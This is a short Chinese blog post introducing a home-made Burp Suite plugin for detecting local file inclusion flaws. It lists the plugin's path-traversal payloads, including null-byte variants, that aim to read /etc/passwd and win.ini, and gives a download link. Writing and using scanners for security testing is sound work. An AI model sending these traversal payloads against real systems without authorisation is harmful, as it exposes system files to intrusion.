本地文件包含漏洞检测工具 – Burp国产插件LFI scanner checks

释放双眼,带上耳机,听听看~!

LFI scanner checks是为了我自己为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的,只能自己写一个插件了。

先看下截图:

来对比下J2EESCAN里面附带的LFI探测

下面是安装上 LFI scanner checks

我使用的payload如下

../../../../../../../../../../../../../../../../etc/passwd%00.html
../../../../../../../../../../../../../../../../etc/passwd
file:///etc/passwd
file:///c:/windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini%00.html

如果有好的建议,可以在评论中给我留言

下载地址

链接: http://pan.baidu.com/s/1gdfITIN 密码: 4fv7

提示:请自行检测程序安全性

*工具作者:lufei(原创工具),转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

人已赞赏
安全工具

内网渗透辅助利器 – xosVer

2019-11-15 4:59:38

安全工具

Kali 2.0中无线安全工具更新特性(浅谈pixie结合reaver的攻击原理)

2019-11-15 4:59:42

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索